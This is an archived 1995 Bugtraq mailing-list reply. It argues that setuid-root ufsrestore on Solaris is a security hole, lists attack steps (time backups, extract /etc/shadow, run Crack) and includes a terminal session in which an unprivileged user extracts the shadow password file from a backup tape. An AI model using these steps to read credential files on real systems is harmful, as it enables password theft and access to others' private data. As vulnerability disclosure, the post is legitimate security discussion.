[2445] in bugtraq
Re: ufsrestore suid root not a security hole
daemon@ATHENA.MIT.EDU (Eduardo E. Silva)
Tue Dec 12 12:21:12 1995
Date: Tue, 12 Dec 1995 00:39:30 -0800
Reply-To: Bugtraq List <BUGTRAQ@CRIMELAB.COM>
From: "Eduardo E. Silva" <esilva@NETCOM.COM>
X-To: BUGTRAQ@CRIMELAB.COM
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@CRIMELAB.COM>
In-Reply-To: <199511170445.OAA05276@chimaera.itc.gu.edu.au> from "Sean
Vickery" at Nov 17, 95 02:45:45 pm
Sean Vickery wrote:
>
> On 14 November 1995, Brett Lymn wrote:
> > According to Jake Luck:
> > >
> > >yeah, but what about /usr/sbin/ufsrestore ?
> > >
> > >it is statically linked, utilizes syslog, and suid root.
> > >
> >
> > If you are a BOFH then just kill the setuid bit on ufsrestore. It
> > means that root has to do the restores but it does close an awful lot
> > of holes (like someone dragging in a QIC and restoring their favourite
> > version of /etc/passwd.... need I say more?). Or you could just
> > remove the global rx though this may bugger up remote root users.
>
> Yes, /usr/sbin/ufsrestore is suid root on my Solaris 2 box. But it is more
> careful than to allow an unprivileged user create or overwrite files just
> anywhere.
>
BUT, it will let you read ANY file from the tape. Including
root owned files such as /etc/shadow.
* Know when UNIX admins runs backups.
* Extract files with ufsrestore (/etc/shadow)
* Run Crack.
* Or you could be reading root's mail, CEO email ...etc,etc
$ pwd
/home/esilva/ED_SILVA
$ date
Mon Dec 11 19:33:13 PST 1995
$ /usr/ucb/whoami
esilva
$ mt -f /dev/rmt/0 status
Exabyte EXB-8500 8mm tape drive:
sense key(0x0)= No Additional Sense residual= 0 retries= 0
file no= 0 block no= 0
$ mt -f /dev/rmt/0 rewind
$ pwd
/home/esilva/ED_SILVA
$ ufsrestore -i /dev/rmt/0cn
ufsrestore >
ufsrestore > ls
.:
.rhosts .sh_history devices/ etc/
ufsrestore > cd etc
ufsrestore > add shadow
ufsrestore > extract
You have not read any volumes yet.
Unless you know which volume your file(s) are on you should start
with the last volume and work towards the first.
Specify next volume #: 1
set owner/mode for '.'? [yn] y
ufsrestore > quit
$ pwd
/home/esilva/ED_SILVA
$ cd etc
$ ls -la
total 8
drwxrwxr-x 2 esilva other 512 Dec 11 19:54 .
drwxr-xr-x 3 esilva other 512 Oct 11 21:48 ..
-r-------- 1 esilva other 1144 Oct 9 09:21 shadow.1.la
Now run crack...
--
Thanks!
-Ed _
/\o/\
/ <_> \
/^^/ \^^\
/___\
+---------------------------------------------------------------------+
| Can you see them all around us? |
+---------------------------------------------------------------------+
| esilva@netcom.com |
+---------------------------------------------------------------------+
